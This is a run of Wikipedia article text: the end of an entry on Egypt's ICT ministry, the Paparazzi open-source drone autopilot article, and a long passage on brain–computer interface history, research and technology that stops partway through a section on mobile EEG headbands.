Egypt's Smart Village is a business park covering three million square meters and offers high-tech facilities and infrastructure for IT and telecom companies.
Technology Development Fund
The Technology Development Fund is a venture capital fund established by the Ministry of Communications and Information Technology in 2004 as a public-private partnership to finance and support Egyptian startups in the ICT sector.
See also
Cabinet of Egypt
References
External links
Ministry of Communications and Information Technology official site
National Telecommunications Regulatory Authority (NTRA)
Information Technology Industry Development Agency (ITIDA)
Information Technology Institute (ITI)
Smart Village Cairo, business and technology park
Egypt's Cabinet Database
1999 establishments in Egypt
Communications in Egypt
Egypt
Information ministries
Communications and Information Technology (Egypt)
Communications and Information Technology
|
35049688
|
https://en.wikipedia.org/wiki/Paparazzi%20Project
|
Paparazzi Project
|
Paparazzi is an open-source autopilot system oriented toward inexpensive autonomous aircraft.
Low cost and availability enable hobbyist use in small remotely piloted aircraft. The project began in 2003, and is being further developed and used at École nationale de l'aviation civile (ENAC), a French civil aeronautics academy. Several vendors are currently producing Paparazzi autopilots and accessories.
Overview
An autopilot allows a remotely piloted aircraft to be flown out of sight. All hardware and software is open-source and freely available to anyone under the GNU licensing agreement. Open Source autopilots provide flexible hardware and software.
Users can easily modify the autopilot based on their own special requirements, such as forest fire evaluation.
Paparazzi collaborators share ideas and information using the same MediaWiki software that is used by Wikipedia.
Paparazzi accepts commands and sensor data, and adjusts flight controls accordingly. For example, a command might be to climb at a certain rate, and paparazzi will adjust power and/or control surfaces. As of 2010 paparazzi did not have a good speed hold and changing function, because no air
speed sensor reading is considered by the controller.
Delft University of Technology released its Lisa/S chip project in 2013 which is based on Paparazzi.
Mechanisms
Hardware
Paparazzi supports for multiple hardware designs, including STM32 and LPC2100 series microcontrollers. A number of CAD files have been released.
Paparazzi provides for a minimum set of flight sensors:
Attitude (orientation about center of mass) estimation is done with a set of infrared thermopiles.
Position and altitude are obtained from a standard GPS receiver.
Roll rate measurement may be input from an optional gyroscope.
Acceleration from optional inertial sensors.
Direction from optional magnetic sensors.
Software
The open-source software suite "contains everything" to let "airborne system fly reliably".
See also
Crowdsourcing
Micro air vehicle
ArduCopter open source autopilot software
OpenPilot open source autopilot software
Open-source robotics
PX4 autopilot
Slugs (autopilot system)
Ardupilot
References
External links
Paparazzi Project
24th Chaos Communication Congress 2007-12-27 11:45 Martin Müller, Antoine Drouin
Build your own UAV
Paparazzi User Manual
OSAM (Open Source Autonomous Multiple-Unmanned Aerial Vehicle) at Utah State University
(Open Source Drone Projects)
Avionics
Aircraft instruments
Unmanned aerial vehicles
Free software
Open-source hardware
|
623686
|
https://en.wikipedia.org/wiki/Brain%E2%80%93computer%20interface
|
Brain–computer interface
|
A brain–computer interface (BCI), sometimes called a brain–machine interface (BMI), is a direct communication pathway between the brain's electrical activity and an external device, most commonly a computer or robotic limb. BCIs are often directed at researching, mapping, assisting, augmenting, or repairing human cognitive or sensory-motor functions. Implementations of BCIs range from non-invasive (EEG, MEG, EOG, MRI) and partially invasive (ECoG and endovascular) to invasive (microelectrode array), based on how close electrodes get to brain tissue.
Research on BCIs began in the 1970s by Jacques Vidal at the University of California, Los Angeles (UCLA) under a grant from the National Science Foundation, followed by a contract from DARPA. The Vidal's 1973 paper marks the first appearance of the expression brain–computer interface in scientific literature.
Due to the cortical plasticity of the brain, signals from implanted prostheses can, after adaptation, be handled by the brain like natural sensor or effector channels. Following years of animal experimentation, the first neuroprosthetic devices implanted in humans appeared in the mid-1990s.
Recently, studies in human-computer interaction via the application of machine learning to statistical temporal features extracted from the frontal lobe (EEG brainwave) data has had high levels of success in classifying mental states (Relaxed, Neutral, Concentrating), mental emotional states (Negative, Neutral, Positive) and thalamocortical dysrhythmia.
History
The history of brain–computer interfaces (BCIs) starts with Hans Berger's discovery of the electrical activity of the human brain and the development of electroencephalography (EEG). In 1924 Berger was the first to record human brain activity by means of EEG. Berger was able to identify oscillatory activity, such as Berger's wave or the alpha wave (8–13 Hz), by analyzing EEG traces.
Berger's first recording device was very rudimentary. He inserted silver wires under the scalps of his patients. These were later replaced by silver foils attached to the patient's head by rubber bandages. Berger connected these sensors to a Lippmann capillary electrometer, with disappointing results. However, more sophisticated measuring devices, such as the Siemens double-coil recording galvanometer, which displayed electric voltages as small as one ten thousandth of a volt, led to success.
Berger analyzed the interrelation of alternations in his EEG wave diagrams with brain diseases. EEGs permitted completely new possibilities for the research of human brain activities.
Although the term had not yet been coined, one of the earliest examples of a working brain-machine interface was the piece Music for Solo Performer (1965) by the American composer Alvin Lucier. The piece makes use of EEG and analog signal processing hardware (filters, amplifiers, and a mixing board) to stimulate acoustic percussion instruments. To perform the piece one must produce alpha waves and thereby "play" the various percussion instruments via loudspeakers which are placed near or directly on the instruments themselves.
UCLA Professor Jacques Vidal coined the term "BCI" and produced the first peer-reviewed publications on this topic. Vidal is widely recognized as the inventor of BCIs in the BCI community, as reflected in numerous peer-reviewed articles reviewing and discussing the field (e.g.,). A review pointed out that Vidal's 1973 paper stated the "BCI challenge" of controlling external objects using EEG signals, and especially use of Contingent Negative Variation (CNV) potential as a challenge for BCI control. The 1977 experiment Vidal described was the first application of BCI after his 1973 BCI challenge. It was a noninvasive EEG (actually Visual Evoked Potentials (VEP)) control of a cursor-like graphical object on a computer screen. The demonstration was movement in a maze.
After his early contributions, Vidal was not active in BCI research, nor BCI events such as conferences, for many years. In 2011, however, he gave a lecture in Graz, Austria, supported by the Future BNCI project, presenting the first BCI, which earned a standing ovation. Vidal was joined by his wife, Laryce Vidal, who previously worked with him at UCLA on his first BCI project.
In 1988, a report was given on noninvasive EEG control of a physical object, a robot. The experiment described was EEG control of multiple start-stop-restart of the robot movement, along an arbitrary trajectory defined by a line drawn on a floor. The line-following behavior was the default robot behavior, utilizing autonomous intelligence and autonomous source of energy. This 1988 report written by Stevo Bozinovski, Mihail Sestakov, and Liljana Bozinovska was the first one about a robot control using EEG.
In 1990, a report was given on a closed loop, bidirectional adaptive BCI controlling computer buzzer by an anticipatory brain potential, the Contingent Negative Variation (CNV) potential. The experiment described how an expectation state of the brain, manifested by CNV, controls in a feedback loop the S2 buzzer in the S1-S2-CNV paradigm. The obtained cognitive wave representing the expectation learning in the brain is named Electroexpectogram (EXG). The CNV brain potential was part of the BCI challenge presented by Vidal in his 1973 paper.
Studies in 2010s suggested the potential ability of neural stimulation to restore functional connectively and associated behaviors through modulation of molecular mechanisms of synaptic efficacy. This opened the door for the concept that BCI technologies may be able to restore function in addition to enabling functionality.
Since 2013, DARPA has funded BCI technology through the BRAIN initiative, which has supported work out of the University of Pittsburgh Medical Center, Paradromics, Brown, and Synchron, among others.
BCIs versus neuroprosthetics
Neuroprosthetics is an area of neuroscience concerned with neural prostheses, that is, using artificial devices to replace the function of impaired nervous systems and brain-related problems, or of sensory organs or organs itself (bladder, diaphragm, etc.). As of December 2010, cochlear implants had been implanted as neuroprosthetic device in approximately 220,000 people worldwide. There are also several neuroprosthetic devices that aim to restore vision, including retinal implants. The first neuroprosthetic device, however, was the pacemaker.
The terms are sometimes used interchangeably. Neuroprosthetics and BCIs seek to achieve the same aims, such as restoring sight, hearing, movement, ability to communicate, and even cognitive function. Both use similar experimental methods and surgical techniques.
Animal BCI research
Several laboratories have managed to record signals from monkey and rat cerebral cortices to operate BCIs to produce movement. Monkeys have navigated computer cursors on screen and commanded robotic arms to perform simple tasks simply by thinking about the task and seeing the visual feedback, but without any motor output. In May 2008 photographs that showed a monkey at the University of Pittsburgh Medical Center operating a robotic arm by thinking were published in a number of well-known science journals and magazines. Sheep too have been used to evaluate BCI technology including Synchron's Stentrode.
In 2020, Elon Musk's Neuralink was successfully implanted in a pig, announced in a widely viewed webcast. In 2021 Elon Musk announced that he had successfully enabled a monkey to play video games using Neuralink's device.
Early work
In 1969 the operant conditioning studies of Fetz and colleagues,
at the Regional Primate Research Center and Department of Physiology and Biophysics, University of Washington School of Medicine in Seattle, showed for the first time that monkeys could learn to control the deflection of a biofeedback meter arm with neural activity. Similar work in the 1970s established that monkeys could quickly learn to voluntarily control the firing rates of individual and multiple neurons in the primary motor cortex if they were rewarded for generating appropriate patterns of neural activity.
Studies that developed algorithms to reconstruct movements from motor cortex neurons, which control movement, date back to the 1970s. In the 1980s, Apostolos Georgopoulos at Johns Hopkins University found a mathematical relationship between the electrical responses of single motor cortex neurons in rhesus macaque monkeys and the direction in which they moved their arms (based on a cosine function). He also found that dispersed groups of neurons, in different areas of the monkey's brains, collectively controlled motor commands, but was able to record the firings of neurons in only one area at a time, because of the technical limitations imposed by his equipment.
There has been rapid development in BCIs since the mid-1990s. Several groups have been able to capture complex brain motor cortex signals by recording from neural ensembles (groups of neurons) and using these to control external devices.
Prominent research successes
Kennedy and Yang Dan
Phillip Kennedy (who later founded Neural Signals in 1987) and colleagues built the first intracortical brain–computer interface by implanting neurotrophic-cone electrodes into monkeys.
In 1999, researchers led by Yang Dan at the University of California, Berkeley decoded neuronal firings to reproduce images seen by cats. The team used an array of electrodes embedded in the thalamus (which integrates all of the brain's sensory input) of sharp-eyed cats. Researchers targeted 177 brain cells in the thalamus lateral geniculate nucleus area, which decodes signals from the retina. The cats were shown eight short movies, and their neuron firings were recorded. Using mathematical filters, the researchers decoded the signals to generate movies of what the cats saw and were able to reconstruct recognizable scenes and moving objects. Similar results in humans have since been achieved by researchers in Japan (see below).
Nicolelis
Miguel Nicolelis, a professor at Duke University, in Durham, North Carolina, has been a prominent proponent of using multiple electrodes spread over a greater area of the brain to obtain neuronal signals to drive a BCI.
After conducting initial studies in rats during the 1990s, Nicolelis and his colleagues developed BCIs that decoded brain activity in owl monkeys and used the devices to reproduce monkey movements in robotic arms. Monkeys have advanced reaching and grasping abilities and good hand manipulation skills, making them ideal test subjects for this kind of work.
By 2000, the group succeeded in building a BCI that reproduced owl monkey movements while the monkey operated a joystick or reached for food. The BCI operated in real time and could also control a separate robot remotely over Internet protocol. But the monkeys could not see the arm moving and did not receive any feedback, a so-called open-loop BCI.
Later experiments by Nicolelis using rhesus monkeys succeeded in closing the feedback loop and reproduced monkey reaching and grasping movements in a robot arm. With their deeply cleft and furrowed brains, rhesus monkeys are considered to be better models for human neurophysiology than owl monkeys. The monkeys were trained to reach and grasp objects on a computer screen by manipulating a joystick while corresponding movements by a robot arm were hidden. The monkeys were later shown the robot directly and learned to control it by viewing its movements. The BCI used velocity predictions to control reaching movements and simultaneously predicted handgripping force. In 2011 O'Doherty and colleagues showed a BCI with sensory feedback with rhesus monkeys. The monkey was brain controlling the position of an avatar arm while receiving sensory feedback through direct intracortical stimulation (ICMS) in the arm representation area of the sensory cortex.
Donoghue, Schwartz and Andersen
Other laboratories which have developed BCIs and algorithms that decode neuron signals include the Carney Institute for Brain Science at Brown University and the labs of Andrew Schwartz at the University of Pittsburgh and Richard Andersen at Caltech. These researchers have been able to produce working BCIs, even using recorded signals from far fewer neurons than did Nicolelis (15–30 neurons versus 50–200 neurons).
John Donoghue's lab at the Carney Institute reported training rhesus monkeys to use a BCI to track visual targets on a computer screen (closed-loop BCI) with or without assistance of a joystick. Schwartz's group created a BCI for three-dimensional tracking in virtual reality and also reproduced BCI control in a robotic arm. The same group also created headlines when they demonstrated that a monkey could feed itself pieces of fruit and marshmallows using a robotic arm controlled by the animal's own brain signals.
Andersen's group used recordings of premovement activity from the posterior parietal cortex in their BCI, including signals created when experimental animals anticipated receiving a reward.
Other research
In addition to predicting kinematic and kinetic parameters of limb movements, BCIs that predict electromyographic or electrical activity of the muscles of primates are being developed. Such BCIs could be used to restore mobility in paralyzed limbs by electrically stimulating muscles.
Miguel Nicolelis and colleagues demonstrated that the activity of large neural ensembles can predict arm position. This work made possible creation of BCIs that read arm movement intentions and translate them into movements of artificial actuators. Carmena and colleagues programmed the neural coding in a BCI that allowed a monkey to control reaching and grasping movements by a robotic arm. Lebedev and colleagues argued that brain networks reorganize to create a new representation of the robotic appendage in addition to the representation of the animal's own limbs.
In 2019, researchers from UCSF published a study where they demonstrated a BCI that had the potential to help patients with speech impairment caused by neurological disorders. Their BCI used high-density electrocorticography to tap neural activity from a patient's brain and used deep learning methods to synthesize speech. In 2021, researchers from the same group published a study showing the potential of a BCI to decode words and sentences in an anarthric patient who had been unable to speak for over 15 years.
The biggest impediment to BCI technology at present is the lack of a sensor modality that provides safe, accurate and robust access to brain signals. It is conceivable or even likely, however, that such a sensor will be developed within the next twenty years. The use of such a sensor should greatly expand the range of communication functions that can be provided using a BCI.
Development and implementation of a BCI system is complex and time-consuming. In response to this problem, Gerwin Schalk has been developing a general-purpose system for BCI research, called BCI2000. BCI2000 has been in development since 2000 in a project led by the Brain–Computer Interface R&D Program at the Wadsworth Center of the New York State Department of Health in Albany, New York, United States.
A new 'wireless' approach uses light-gated ion channels such as Channelrhodopsin to control the activity of genetically defined subsets of neurons in vivo. In the context of a simple learning task, illumination of transfected cells in the somatosensory cortex influenced the decision-making process of freely moving mice.
The use of BMIs has also led to a deeper understanding of neural networks and the central nervous system. Research has shown that despite the inclination of neuroscientists to believe that neurons have the most effect when working together, single neurons can be conditioned through the use of BMIs to fire at a pattern that allows primates to control motor outputs. The use of BMIs has led to development of the single neuron insufficiency principle which states that even with a well tuned firing rate single neurons can only carry a narrow amount of information and therefore the highest level of accuracy is achieved by recording firings of the collective ensemble. Other principles discovered with the use of BMIs include the neuronal multitasking principle, the neuronal mass principle, the neural degeneracy principle, and the plasticity principle.
BCIs are also proposed to be applied by users without disabilities. A user-centered categorization of BCI approaches by Thorsten O. Zander and Christian Kothe introduces the term passive BCI. Next to active and reactive BCI that are used for directed control, passive BCIs allow for assessing and interpreting changes in the user state during Human-Computer Interaction (HCI). In a secondary, implicit control loop the computer system adapts to its user improving its usability in general.
Beyond BCI systems that decode neural activity to drive external effectors, BCI systems may be used to encode signals from the periphery. These sensory BCI devices enable real-time, behaviorally-relevant decisions based upon closed-loop neural stimulation.
The BCI Award
The Annual BCI Research Award is awarded in recognition of outstanding and innovative research in the field of Brain-Computer Interfaces. Each year, a renowned research laboratory is asked to judge the submitted projects. The jury consists of world-leading BCI experts recruited by the awarding laboratory. The jury selects twelve nominees, then chooses a first, second, and third-place winner, who receive awards of $3,000, $2,000, and $1,000, respectively.
Human BCI research
Invasive BCIs
Invasive BCI requires surgery to implant electrodes under scalp for communicating brain signals. The main advantage is to provide more accurate reading; however, its downside includes side effects from the surgery. After the surgery, scar tissues may form which can make brain signals weaker. In addition, according to the research of Abdulkader et al., (2015), the body may not accept the implanted electrodes and this can cause a medical condition.
Vision
Invasive BCI research has targeted repairing damaged sight and providing new functionality for people with paralysis. Invasive BCIs are implanted directly into the grey matter of the brain during neurosurgery. Because they lie in the grey matter, invasive devices produce the highest quality signals of BCI devices but are prone to scar-tissue build-up, causing the signal to become weaker, or even non-existent, as the body reacts to a foreign object in the brain.
In vision science, direct brain implants have been used to treat non-congenital (acquired) blindness. One of the first scientists to produce a working brain interface to restore sight was private researcher William Dobelle.
Dobelle's first prototype was implanted into "Jerry", a man blinded in adulthood, in 1978. A single-array BCI containing 68 electrodes was implanted onto Jerry's visual cortex and succeeded in producing phosphenes, the sensation of seeing light. The system included cameras mounted on glasses to send signals to the implant. Initially, the implant allowed Jerry to see shades of grey in a limited field of vision at a low frame-rate. This also required him to be hooked up to a mainframe computer, but shrinking electronics and faster computers made his artificial eye more portable and now enable him to perform simple tasks unassisted.
In 2002, Jens Naumann, also blinded in adulthood, became the first in a series of 16 paying patients to receive Dobelle's second generation implant, marking one of the earliest commercial uses of BCIs. The second generation device used a more sophisticated implant enabling better mapping of phosphenes into coherent vision. Phosphenes are spread out across the visual field in what researchers call "the starry-night effect". Immediately after his implant, Jens was able to use his imperfectly restored vision to drive an automobile slowly around the parking area of the research institute. Unfortunately, Dobelle died in 2004 before his processes and developments were documented. Subsequently, when Mr. Naumann and the other patients in the program began having problems with their vision, there was no relief and they eventually lost their "sight" again. Naumann wrote about his experience with Dobelle's work in Search for Paradise: A Patient's Account of the Artificial Vision Experiment and has returned to his farm in Southeast Ontario, Canada, to resume his normal activities.
Movement
BCIs focusing on motor neuroprosthetics aim to either restore movement in individuals with paralysis or provide devices to assist them, such as interfaces with computers or robot arms.
Researchers at Emory University in Atlanta, led by Philip Kennedy and Roy Bakay, were first to install a brain implant in a human that produced signals of high enough quality to simulate movement. Their patient, Johnny Ray (1944–2002), suffered from 'locked-in syndrome' after suffering a brain-stem stroke in 1997. Ray's implant was installed in 1998 and he lived long enough to start working with the implant, eventually learning to control a computer cursor; he died in 2002 of a brain aneurysm.
Tetraplegic Matt Nagle became the first person to control an artificial hand using a BCI in 2005 as part of the first nine-month human trial of Cyberkinetics's BrainGate chip-implant. Implanted in Nagle's right precentral gyrus (area of the motor cortex for arm movement), the 96-electrode BrainGate implant allowed Nagle to control a robotic arm by thinking about moving his hand as well as a computer cursor, lights and TV. One year later, professor Jonathan Wolpaw received the prize of the Altran Foundation for Innovation to develop a Brain Computer Interface with electrodes located on the surface of the skull, instead of directly in the brain.
More recently, research teams led by the BrainGate group at Brown University and a group led by University of Pittsburgh Medical Center, both in collaborations with the United States Department of Veterans Affairs, have demonstrated further success in direct control of robotic prosthetic limbs with many degrees of freedom using direct connections to arrays of neurons in the motor cortex of patients with tetraplegia.
Communication
In May 2021, a Stanford University team reported a successful proof-of-concept test that enabled a quadraplegic participant to input English sentences at about 86 characters per minute and 18 words per minute. The participant imagined moving his hand to write letters, and the system performed handwriting recognition on electrical signals detected in the motor cortex, utilizing hidden Markov models and recurrent neural networks for decoding.
A report published in July 2021 reported a paralyzed patient was able to communicate 15 words per minute using a brain implant that analyzed motor neurons that previously controlled the vocal tract.
In a recent review article, researchers raised an open question of whether human information transfer rates can surpass that of language with BCIs. Given that recent language research has demonstrated that human information transfer rates are relatively constant across many languages, there may exist a limit at the level of information processing in the brain. On the contrary, this "upper limit" of information transfer rate may be intrinsic to language itself, as a modality for information transfer.
Technical challenges
There exist a number of technical challenges to recording brain activity with invasive BCIs. Advances in CMOS technology are pushing and enabling integrated, invasive BCI designs with smaller size, lower power requirements, and higher signal acquisition capabilities. Invasive BCIs involve electrodes that penetrate brain tissue in an attempt to record action potential signals (also known as spikes) from individual, or small groups of, neurons near the electrode. The interface between a recording electrode and the electrolytic solution surrounding neurons has been modelled using the Hodgkin-Huxley model.
Electronic limitations to invasive BCIs have been an active area of research in recent decades. While intracellular recordings of neurons reveal action potential voltages on the scale of hundreds of millivolts, chronic invasive BCIs rely on recording extracellular voltages which typically are three orders of magnitude smaller, existing at hundreds of microvolts. Further adding to the challenge of detecting signals on the scale of microvolts is the fact that the electrode-tissue interface has a high capacitance at small voltages. Due to the nature of these small signals, for BCI systems that incorporate functionality onto an integrated circuit, each electrode requires its own amplifier and ADC, which convert analog extracellular voltages into digital signals. Because a typical neuron action potential lasts for one millisecond, BCIs measuring spikes must have sampling rates ranging from 300 Hz to 5 kHz. Yet another concern is that invasive BCIs must be low-power, so as to dissipate less heat to surrounding tissue; at the most basic level more power is traditionally needed to optimize signal-to-noise ratio. Optimal battery design is an active area of research in BCIs.Challenges existing in the area of material science are central to the design of invasive BCIs. Variations in signal quality over time have been commonly observed with implantable microelectrodes. Optimal material and mechanical characteristics for long term signal stability in invasive BCIs has been an active area of research. It has been proposed that the formation of glial scarring, secondary to damage at the electrode-tissue interface, is likely responsible for electrode failure and reduced recording performance. Research has suggested that blood-brain barrier leakage, either at the time of insertion or over time, may be responsible for the inflammatory and glial reaction to chronic microelectrodes implanted in the brain. As a result, flexible and tissue-like designs have been researched and developed to minimize foreign-body reaction by means of matching the Young's modulus of the electrode closer to that of brain tissue.
Partially invasive BCIs
Partially invasive BCI devices are implanted inside the skull but rest outside the brain rather than within the grey matter. They produce better resolution signals than non-invasive BCIs where the bone tissue of the cranium deflects and deforms signals and have a lower risk of forming scar-tissue in the brain than fully invasive BCIs. There has been preclinical demonstration of intracortical BCIs from the stroke perilesional cortex.
Endovascular
A systematic review published in 2020 detailed multiple studies, both clinical and non-clinical, dating back decades investigating the feasibility of endovascular BCIs.
In recent years, the biggest advance in partially invasive BCIs has emerged in the area of interventional neurology. In 2010, researchers affiliated with University of Melbourne had begun developing a BCI that could be inserted via the vascular system. The Australian neurologist Thomas Oxley (Mount Sinai Hospital) conceived the idea for this BCI, called Stentrode, which has received funding from DARPA. Preclinical studies evaluated the technology in sheep.
The Stentrode, a monolithic stent electrode array, is designed to be delivered via an intravenous catheter under image-guidance to the superior sagittal sinus, in the region which lies adjacent to motor cortex. This proximity to motor cortex underlies the Stentrode's ability to measure neural activity. The procedure is most similar to how venous sinus stents are placed for the treatment of idiopathic intracranial hypertension. The Stentrode communicates neural activity to a battery-less telemetry unit implanted in the chest, which communicates wirelessly with an external telemetry unit capable of power and data transfer. While an endovascular BCI benefits from avoiding craniotomy for insertion, risks such as clotting and venous thrombosis are possible. In pre-clinical animal studies implanted with Stentrode, twenty animals showed no evidence of thrombus formation after 190 days, possibly due to endothelial incorporation of the Stentrode into the vessel wall.
First-in-human trials with the Stentrode are underway. In November 2020, two participants that suffer from amyotrophic lateral sclerosis were able to wirelessly control an operating system to text, email, shop, and bank using direct thought through the Stentrode brain-computer interface, marking the first time a brain-computer interface was implanted via the patient's blood vessels, eliminating the need for open brain surgery.
ECoG
Electrocorticography (ECoG) measures the electrical activity of the brain taken from beneath the skull in a similar way to non-invasive electroencephalography, but the electrodes are embedded in a thin plastic pad that is placed above the cortex, beneath the dura mater. ECoG technologies were first trialled in humans in 2004 by Eric Leuthardt and Daniel Moran from Washington University in St Louis. In a later trial, the researchers enabled a teenage boy to play Space Invaders using his ECoG implant. This research indicates that control is rapid, requires minimal training, and may be an ideal tradeoff with regards to signal fidelity and level of invasiveness.
Signals can be either subdural or epidural, but are not taken from within the brain parenchyma itself. It has not been studied extensively until recently due to the limited access of subjects. Currently, the only manner to acquire the signal for study is through the use of patients requiring invasive monitoring for localization and resection of an epileptogenic focus.
ECoG is a very promising intermediate BCI modality because it has higher spatial resolution, better signal-to-noise ratio, wider frequency range, and less training requirements than scalp-recorded EEG, and at the same time has lower technical difficulty, lower clinical risk, and may have superior long-term stability than intracortical single-neuron recording. This feature profile and recent evidence of the high level of control with minimal training requirements shows potential for real world application for people with motor disabilities. Light reactive imaging BCI devices are still in the realm of theory.
Recent work published by Edward Chang and Joseph Makin from UCSF revealed that ECoG signals could be used to decode speech from epilepsy patients implanted with high-density ECoG arrays over the peri-Sylvian cortices. Their study achieved word error rates of 3% (a marked improvement from prior publications) utilizing an encoder-decoder neural network, which translated ECoG data into one of fifty sentences composed of 250 unique words.
Non-invasive BCIs
There have also been experiments in humans using non-invasive neuroimaging technologies as interfaces. The substantial majority of published BCI work involves noninvasive EEG-based BCIs. Noninvasive EEG-based technologies and interfaces have been used for a much broader variety of applications. Although EEG-based interfaces are easy to wear and do not require surgery, they have relatively poor spatial resolution and cannot effectively use higher-frequency signals because the skull dampens signals, dispersing and blurring the electromagnetic waves created by the neurons. EEG-based interfaces also require some time and effort prior to each usage session, whereas non-EEG-based ones, as well as invasive ones require no prior-usage training. Overall, the best BCI for each user depends on numerous factors.
Non-EEG-based human–computer interface
Electrooculography (EOG)
In 1989, a report was given on control of a mobile robot by eye movement using Electrooculography (EOG) signals. A mobile robot was driven from a start to a goal point using five EOG commands, interpreted as forward, backward, left, right, and stop. The EOG as a challenge of controlling external objects was presented by Vidal in his 1973 paper.
Pupil-size oscillation
A 2016 article described an entirely new communication device and non-EEG-based human-computer interface, which requires no visual fixation, or ability to move the eyes at all. The interface is based on covert interest; directing one's attention to a chosen letter on a virtual keyboard, without the need to move one's eyes to look directly at the letter. Each letter has its own (background) circle which micro-oscillates in brightness differently from all of the other letters. The letter selection is based on best fit between unintentional pupil-size oscillation and the background circle's brightness oscillation pattern. Accuracy is additionally improved by the user's mental rehearsing of the words 'bright' and 'dark' in synchrony with the brightness transitions of the letter's circle.
Functional near-infrared spectroscopy
In 2014 and 2017, a BCI using functional near-infrared spectroscopy for "locked-in" patients with amyotrophic lateral sclerosis (ALS) was able to restore some basic ability of the patients to communicate with other people.
Electroencephalography (EEG)-based brain-computer interfaces
After the BCI challenge was stated by Vidal in 1973, the initial reports on non-invasive approach included control of a cursor in 2D using VEP (Vidal 1977), control of a buzzer using CNV (Bozinovska et al. 1988, 1990), control of a physical object, a robot, using a brain rhythm (alpha) (Bozinovski et al. 1988), control of a text written on a screen using P300 (Farwell and Donchin, 1988).
In the early days of BCI research, another substantial barrier to using Electroencephalography (EEG) as a brain–computer interface was the extensive training required before users can work the technology. For example, in experiments beginning in the mid-1990s, Niels Birbaumer at the University of Tübingen in Germany trained severely paralysed people to self-regulate the slow cortical potentials in their EEG to such an extent that these signals could be used as a binary signal to control a computer cursor. (Birbaumer had earlier trained epileptics to prevent impending fits by controlling this low voltage wave.) The experiment saw ten patients trained to move a computer cursor by controlling their brainwaves. The process was slow, requiring more than an hour for patients to write 100 characters with the cursor, while training often took many months. However, the slow cortical potential approach to BCIs has not been used in several years, since other approaches require little or no training, are faster and more accurate, and work for a greater proportion of users.
Another research parameter is the type of oscillatory activity that is measured. Gert Pfurtscheller founded the BCI Lab 1991 and fed his research results on motor imagery in the first online BCI based on oscillatory features and classifiers. Together with Birbaumer and Jonathan Wolpaw at New York State University they focused on developing technology that would allow users to choose the brain signals they found easiest to operate a BCI, including mu and beta rhythms.
A further parameter is the method of feedback used and this is shown in studies of P300 signals. Patterns of P300 waves are generated involuntarily (stimulus-feedback) when people see something they recognize and may allow BCIs to decode categories of thoughts without training patients first. By contrast, the biofeedback methods described above require learning to control brainwaves so the resulting brain activity can be detected.
In 2005 it was reported research on EEG emulation of digital control circuits for BCI, with example of a CNV flip-flop. In 2009 it was reported noninvasive EEG control of a robotic arm using a CNV flip-flop. In 2011 it was reported control of two robotic arms solving Tower of Hanoi task with three disks using a CNV flip-flop. In 2015 it was described EEG-emulation of a Schmidt trigger, flip-flop, demultiplexer, and modem.
While an EEG based brain-computer interface has been pursued extensively by a number of research labs, recent advancements made by Bin He and his team at the University of Minnesota suggest the potential of an EEG based brain-computer interface to accomplish tasks close to invasive brain-computer interface. Using advanced functional neuroimaging including BOLD functional MRI and EEG source imaging, Bin He and co-workers identified the co-variation and co-localization of electrophysiological and hemodynamic signals induced by motor imagination.
Refined by a neuroimaging approach and by a training protocol, Bin He and co-workers demonstrated the ability of a non-invasive EEG based brain-computer interface to control the flight of a virtual helicopter in 3-dimensional space, based upon motor imagination. In June 2013 it was announced that Bin He had developed the technique to enable a remote-control helicopter to be guided through an obstacle course.
In addition to a brain-computer interface based on brain waves, as recorded from scalp EEG electrodes, Bin He and co-workers explored a virtual EEG signal-based brain-computer interface by first solving the EEG inverse problem and then used the resulting virtual EEG for brain-computer interface tasks. Well-controlled studies suggested the merits of such a source analysis based brain-computer interface.
A 2014 study found that severely motor-impaired patients could communicate faster and more reliably with non-invasive EEG BCI, than with any muscle-based communication channel.
A 2016 study found that the Emotiv EPOC device may be more suitable for control tasks using the attention/meditation level or eye blinking than the Neurosky MindWave device.
A 2019 study found that the application of evolutionary algorithms could improve EEG mental state classification with a non-invasive Muse device, enabling high quality classification of data acquired by a cheap consumer-grade EEG sensing device.
In a 2021 systematic review of randomized controlled trials using BCI for upper-limb rehabilitation after stroke, EEG-based BCI was found to have significant efficacy in improving upper-limb motor function compared to control therapies. More specifically, BCI studies that utilized band power features, motor imagery, and functional electrical stimulation in their design were found to be more efficacious than alternatives. Another 2021 systematic review focused on robotic-assisted EEG-based BCI for hand rehabilitation after stroke. Improvement in motor assessment scores was observed in three of eleven studies included in the systematic review.
Dry active electrode arrays
In the early 1990s Babak Taheri, at University of California, Davis demonstrated the first single and also multichannel dry active electrode arrays using micro-machining. The single channel dry EEG electrode construction and results were published in 1994. The arrayed electrode was also demonstrated to perform well compared to silver/silver chloride electrodes. The device consisted of four sites of sensors with integrated electronics to reduce noise by impedance matching. The advantages of such electrodes are: (1) no electrolyte used, (2) no skin preparation, (3) significantly reduced sensor size, and (4) compatibility with EEG monitoring systems. The active electrode array is an integrated system made of an array of capacitive sensors with local integrated circuitry housed in a package with batteries to power the circuitry. This level of integration was required to achieve the functional performance obtained by the electrode.
The electrode was tested on an electrical test bench and on human subjects in four modalities of EEG activity, namely: (1) spontaneous EEG, (2) sensory event-related potentials, (3) brain stem potentials, and (4) cognitive event-related potentials. The performance of the dry electrode compared favorably with that of the standard wet electrodes in terms of skin preparation, no gel requirements (dry), and higher signal-to-noise ratio.
In 1999 researchers at Case Western Reserve University, in Cleveland, Ohio, led by Hunter Peckham, used 64-electrode EEG skullcap to return limited hand movements to quadriplegic Jim Jatich. As Jatich concentrated on simple but opposite concepts like up and down, his beta-rhythm EEG output was analysed using software to identify patterns in the noise. A basic pattern was identified and used to control a switch: Above average activity was set to on, below average off. As well as enabling Jatich to control a computer cursor the signals were also used to drive the nerve controllers embedded in his hands, restoring some movement.
SSVEP mobile EEG BCIs
In 2009, the NCTU Brain-Computer-Interface-headband was reported. The researchers who developed this BCI-headband also engineered silicon-based microelectro-mechanical system (MEMS) dry electrodes designed for application in non-hairy sites of the body. These electrodes were secured to the DAQ board in the headband with snap-on electrode holders. The signal processing module measured alpha activity and the Bluetooth enabled phone assessed the patients' alertness and capacity for cognitive performance. When the subject became drowsy, the phone sent arousing feedback to the operator to rouse them. This research was supported by the National Science Council, Taiwan, R.O.C., NSC, National Chiao-Tung University, Taiwan's Ministry of Education, and the U.S. Army Research Laboratory.
